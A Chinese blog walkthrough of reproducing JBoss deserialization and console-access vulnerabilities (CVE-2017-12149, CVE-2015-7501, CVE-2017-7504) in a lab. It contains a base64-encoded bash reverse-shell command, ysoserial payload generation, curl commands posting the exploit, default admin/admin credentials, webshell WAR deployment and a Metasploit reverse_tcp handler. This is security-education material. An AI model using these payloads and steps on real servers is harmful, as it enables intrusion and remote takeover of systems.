JBoss漏洞复现

最新推荐文章于 2024-09-22 16:48:16 发布
最新推荐文章于 2024-09-22 16:48:16 发布
阅读量65 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43335965/article/details/133012371
版权

0x01:JBoss安装

下载地址:https://jbossas.jboss.org/downloads/

1. 安装java环境

JDK版本应当在1.6-1.7之间,1.8版本jboss运行jmx console会出现500错误

image-20210817162621096

2. 安装Jboss

新建环境变量

JBOSS_HOME 值为 C:\jboss-6.1.0.Final

image-20210817163702947

在path中加入

%JBOSS_HOME%\bin

image-20210817163808038

双击run.bat

image-20210817163843820

出现indo信息说明安装成功

image-20210817163947591

我们访问8080端口

image-20210817164446063

3. 注意点

JBoss默认部署的路径为

C:\jboss-6.1.0.Final\server\default\deploy\ROOT.war

如果需要向外网开放,我们修改C:\jboss-6.1.0.Final\server\default\deploy\jbossweb.sar\server.xml文件

image-20210817165206161

然后重新运行run.bat

0x02:JBOSS5.x/6.x反序列化漏洞(CVE-2017-12149)

1. 漏洞原理

​ 该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。

2. 影响版本

Jboss5.x/6.x

3. 漏洞复现

该漏洞出现在/invoker/readonly请求中,服务器将用户提交的POST内容进行了Java反序列化,访问/invoker/readonly目录,返回500即存在漏洞

image-20210817170153692

我们用常规Java反序列化漏洞测试方法来复现该漏洞。我们使用bash来反弹shell,但由于Runtime.getRuntime().exec()中不能使用管道符等bash需要的方法,我们需要用进行一次编码。

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}

image-20210817171423970

使用ysoserial来复现生成序列化数据,由于Vulhub使用的Java版本较新,所以选择使用的gadget是CommonsCollections5:

java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4Ljg4LjEzMy8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" > poc.ser

生成poc.ser文件,这个就是我们的exp。

image-20210817172755152

nc启动监听。然后我们发送exp

image-20210817172900229

成功收到shell

image-20210817172920306

0x03:JBoss JMXInvokerServle反序列化漏洞(CVE-2015-7501)

1. 漏洞原理

这是经典的JBoss反序列化漏洞,JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的对象,然后我们利用Apache Commons Collections中的Gadget执行任意代码。

2. 影响版本

image-20210817175001611

3. 漏洞复现

​ JBoss在处理/invoker/JMXInvokerServlet请求的时候读取了对象,所以我们直接将ysoserial生成好的POC附在POST Body中发送即可。

访问 /invoker/JMXInvokerServlet,返回如下说明存在漏洞

image-20210817175315898

我们利用上面漏洞生成的exp。发送到/invoker/JMXInvokerServlet接口

curl http://192.168.88.133:8080/invoker/JMXInvokerServlet --data-binary @poc.ser

image-20210817175539911

反弹回shell

image-20210817175551397

0x04:JBOSSMQ JMS反序列化漏洞(CVE-2017-7504)

1. 漏洞原理

​ Jboss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invoca Layer的HTTPServerLServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。

2. 影响版本

JBoss 4.x以及之前的所有版本

3. 漏洞复现

访问/jbossmq-httpil/HTTPServerILServlet

image-20210817180428513

还是利用前面生成的exp,发送到/jbossmq-httpil/HTTPServerILServlet接口。

curl http://192.168.88.133:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @poc.ser

image-20210817180637900

反弹回shell

image-20210817180654683

0x05:JBOSS EJBInvokerServlet反序列化漏洞(CVE-2013-4810)

http://x.x.x.x:8080/invoker/EJBInvokerServle

image-20210817180903375

0x06:Administratot Console弱口令

Administrator Console管理员面存在弱口令,admin/admin,登录后台上传war包。

image-20210817195054603

跳转到后台

image-20210817195131251

密码admin/admin。登录

image-20210817200414088

点击Add a new source,然后点击浏览上传war包。冰蝎成功连接。

image-20210817201038657

修改密码在

C:\jboss-6.1.0.Final\server\default\conf\props\jmx-console-users.properties

image-20210817201549496

0x07:低版本JMX Concole未授权访问

1. 漏洞原理

在低版本中,默认可以访问Jboss web控制台(http://127.0.0.1:8080/jmx-console),无需用户名和密码。

jboss 4.x及其之前版本ocnsole管理路径为/jmx-console/和/web-console/

jmx-console的配置文件为:

C:\jboss-4.2.3.GA\server\default\deploy\jmx-console.war\WEB-INF\jboss-web.xml

web-console的配置文件为:

C:\jboss-4.2.3.GA\server\default\deploy\management\console-mgr.sar\web-console.war\WEB-INF\jboss-web.xml

jmx-console和web-console共用一个账号密码

C:\jboss-4.2.3.GA\server\default\conf\props\jmx-console-users.properties

2. 漏洞复现

这里用的4.2.3版本

image-20210818163956304

点击jmx console

image-20210818164035334

然后找到jboss.deployment(jboss 自带的部署功能)中的flavor=URL,type=DeploymentScanner点进去(通过 url 的方式远程部署)

image-20210818164213616

然后我们在下面的地方添加我们vps上面war包的地址

image-20210818165939538

然后点击invoke,出现下面也面说明成功上传

然后我们回到jmx-console页面。成功上传shell。

image-20210818172811718

路径如下

image-20210818172846189

我们利用冰蝎连接

image-20210818174335021

0x08:高版本JMX Console未授权访问

这里借助JMXInvokerServlet-deserialization的vulhub环境

点击JMX Console

image-20210818175155370

进入页面后点击jboss.system链接,进入页面后点击service=MainDeployer

image-20210818175500587

进入页面后找到deploy填写远程war地址进行远程部署。

image-20210818175747118

成功部署

image-20210818175912467

我们可以在这个地方看到我们上传的shell

image-20210818180044339

冰蝎连接即可。

0x09:自动化工具

http://192.168.88.133:8080/

image-20210818181435620

反弹shell

image-20210818181927240

image-20210818182003579

联动metasploit

msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.88.133
msf6 exploit(multi/handler) > set lport 7654
msf6 exploit(multi/handler) > exploit -j

然后执行

image-20210818182701857

拿到meterpreter shell,但是一会就断开了。

image-20210818182921170

Held0
关注
jboss漏洞复现
赵花花08042的博客
12-13 752
JBoss JMXInvokerServlet 反序列化漏洞 https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ https://paper.seebug.org/312/ https://vulhub.org/#/environments/jboss/JMXInvokerServlet-deserialization/ JBoss在/invoker/JMXInvokerServlet请求中读取了用户传入的
Jboss漏洞复现(附带修复方法)
C233333235的博客
08-07 1231
JBoss是⼀个基于J2EE的开发源代码的应⽤服务器。JBoss代码遵循LGPL许可,可以在任何商业应⽤中 免费使⽤。JBoss是⼀个管理EJB的容器和服务器,⽀持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核⼼ 服务不包括⽀持servlet/JSP的WEB容器,⼀般与Tomcat或Jetty绑定使⽤。在J2EE应⽤服务器领域, JBoss是发展最为迅速应⽤服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发, 这使得JBoss⼴为流⾏。
JBoss漏洞复现(保姆级教学)
m0_69043895的博客
04-25 720
漏洞原理:该漏洞为 Java反序列化错误类型,存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化,从而导致了漏洞。访问http://192.10.131.8:8080/invoker/readonly,若返回如下界面则存在漏洞。这个时候,可以通过执行命令在kali上反弹shell,需要将命令进行base64编码。在自己服务器上部署一个webshell的war包。然后再压缩成war文件。
JBoss 漏洞复现
m0_43397796的博客
03-02 4065
JBoss 漏洞复现 CVE-2017-12149 JBoss AS 5.X/6.X反序列化漏洞 漏洞扫描 试验地址:https://www.hetianlab.com/expc.do?w=exp_ass&ec=ECIDb56f-ab5c-4e92-840f-d59299ec273f 由于实验指导书上的ip有错误,所以先nmap扫描一下ipnmap -sn 10.1.1.0/24 发现4个ip 全端口扫描nmap -p- -sV -T4 10.1.1.254 10.1.1.135 10.1.1.9
Jboss 漏洞复现
2301_80402555的博客
09-22 756
2、找到jboss.deployment (jboss ⾃带得部署功能) 中的flavor=URL,type=DeploymentScanner点进去(通过URL的⽅式远程部署)在JMX Console⻚⾯点击jboss.system链接,在Jboss.system⻚⾯中点击service=MainDeployer,如下。2、进⼊service=MainDeployer⻚⾯之后,找到methodIndex为17或19的deploy 填写远程war包地址进⾏远程部署。4、制作war包 填写war包远程地址。
Jboss】常见漏洞复现
m0_59151303的博客
08-06 1173
JBoss是一个基于J2EE的开发源代码的应用服务器。JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
JBoss漏洞总结复现
1ance's blog
10-08 2340
目录简介JBoss发序列化漏洞(CVE-2017-12149)漏洞描述漏洞原理影响范围漏洞复现修复建议JBossMQ JMS反序列化漏洞(CVE-2017-7504)漏洞描述漏洞原理影响范围复现过程修复建议JBoss JMXInvokerServlet反序列化漏洞(CVE-2015-7501)漏洞描述漏洞原理影响范围复现过程修复建议JBoss EJBInvokerServlet 反序列化漏洞(CVE-2013-4810)漏洞描述影响范围复现过程修复建议总结 简介 Jboss是一个基于J2EE的开放源代码的
jboss中间件漏洞复现
mingyqf的博客
02-15 1462
参考:https://blog.csdn.net/cj_Allen/article/details/109522771 JBOSS简介 JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于J
vulhub漏洞复现-jboss反序列化漏洞复现
weixin_45095113的博客
12-21 706
vulhub漏洞复现-jboss反序列化漏洞
CVE-2017-12149JBOSS漏洞复现
ranuy阮的博客
05-07 1832
漏洞描述 JBOSS Application Server是一个基于J2EE的开放源代码的应用服务器。 2017年8月30日,厂商Redhat发布了一个JBOSSAS 5.x 的反序列化远程代码执行漏洞通告。该漏洞位于JBoss的HttpInvoker组件中的 ReadOnlyAccessFilter 过滤器中,其doFilter方法在没有进行任何安全检查和限制的情况下尝试将来自客户端的序列化数据...
JBoss系列漏洞复现以及实战心得
jammny
09-10 2002
前言 jBoss是一个基于J2EE的开发源代码的应用服务器。 JBoss代码遵循LGPL许可,可以在任何商业应用中免费使用。JBoss是一个管理EJB的容器和服务器,支持EJB1.1、EJB 2.0和EJB3的规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。 谷歌语法:inurl:/console/ intitle:"JBoss Management" 一、JBoss JMXInvokerServlet 反序列化漏洞 JBoss在.
网安漏洞复现系列:漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
weixin_54626591的博客
05-06 229
漏洞复现JBoss 4.x JBossMQ JMS 反序列化漏洞CVE-2017-7504)
CPA 税法 马兆瑞 基础班 第11章 偶然所得应纳税额的计算 税收优惠.pdf
最新发布
10-10
CPA 税法 马兆瑞 基础班 第11章 偶然所得应纳税额的计算 税收优惠.pdf
python入门教程学习攻略总结 python就看这个章节总结
10-10
python入门 Python入门教程知识点 第一章:Python简介与环境搭建 1.1 章节知识点目录 Python的历史与特点 Python的版本选择(Python 2 vs Python 3) Python开发环境搭建(IDE介绍:PyCharm, VSCode, Jupyter Notebook) 第一个Python程序:Hello, World! 第二章:Python基础语法 2.1 章节知识点目录 变量与数据类型(整数、浮点数、字符串、布尔值) 运算符与表达式 条件语句(if...else) 循环结构(for循环,while循环) 函数定义与调用 第三章:数据结构 3.1 章节知识点目录 列表(List)与元组(Tuple) 字典(Dictionary)与集合(Set) 字符串操作 列表推导式与生成器表达式 第四章:面向对象编程(OOP) 4.1 章节知识点目录 类与对象的概念 类的定义与实例化 属性与方法 继承与多态 封装与抽象 4.2 重点内容 类是创建对象的蓝图,包含属性和方法。 对象是根据类实例化得到的实体,具有自己的状态和行为。 继承允许新类继承父类
SpringBoot+Vue电影订票系统答辩PPT.pptx
10-10
计算机毕业设计答辩PPT
SpringBoot+Vue川剧科普平台答辩PPT.pptx
10-10
计算机毕业设计答辩PPT
OpenCV图像锐化的实现及原理介绍(包含详细的完整的程序和数据)
10-10
内容概要:本文章深入解析了使用OpenCV进行图像锐化的方法,特别是通过邻居访问运用拉普拉斯算子提高图像的边缘清晰度的技术原理。文中不仅介绍了锐化算法的工作方式,还展示了从环境搭建到编码实现再到最终成果展现的具体流程,并讨论了几种常用的边界处理手段及其在cv::filter2D函数中的应用实例。同时提到了几种潜在的研究改善方向及注意事项。 适用人群:对计算机视觉技术感兴趣的研发人员、软件工程师或相关领域的研究学者。 使用场景及目标:旨在教授如何运用OpenCV完成图像锐化,以增强图像轮廓与细节特征提取效率;帮助开发者熟悉滤波技术的实际操作方法,并理解背后的概念与设计思想。 其他说明:此资源强调动手能力,在提供理论的同时,也提供了具体执行指导,适合作为开放项目教程或实验练习的基础材料。
tomcat weblogic jboss 漏洞
12-16
在互联网上,Tomcat、WebLogic和Jboss都是常见的应用服务器。由于它们在网站和应用中的广泛使用,这些服务器可能存在漏洞。在过去的几年中,这些应用服务器都曾发生过漏洞事件。 Tomcat是一个由Apache基金开发的开源Java Servlet容器,它可用于部署和管理Java应用程序。在过去,Tomcat曾经发生过一些安全漏洞,例如路径遍历漏洞和身份验证绕过漏洞。这些漏洞有可能导致黑客可以利用Tomcat服务器来执行恶意代码或窃取敏感信息。 WebLogic是Oracle公司开发的企业级Java应用服务器,供企业用于构建和部署企业级应用程序。在过去,WebLogic也曾发生过一些漏洞事件,例如XMLDecoder漏洞和未经授权的远程攻击漏洞。这些漏洞可能导致黑客远程控制服务器或获取敏感数据。 Jboss是一款开源的Java应用服务器,它广泛用于企业级应用程序的构建和部署。过去,Jboss也存在过一些漏洞,比如JMX控制台未授权访问漏洞和远程代码执行漏洞。这些漏洞可能被利用来执行恶意操作和窃取数据。 为了防止这些漏洞对系统造成危害,用户应该及时安装官方发布的补丁和更新,加强服务器的安全配置,限制对服务器的访问权限,定期进行安全审计和漏洞扫描。同时,开发人员也应该编写健壮安全的代码,以减少在应用程序中发现漏洞的可能性。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值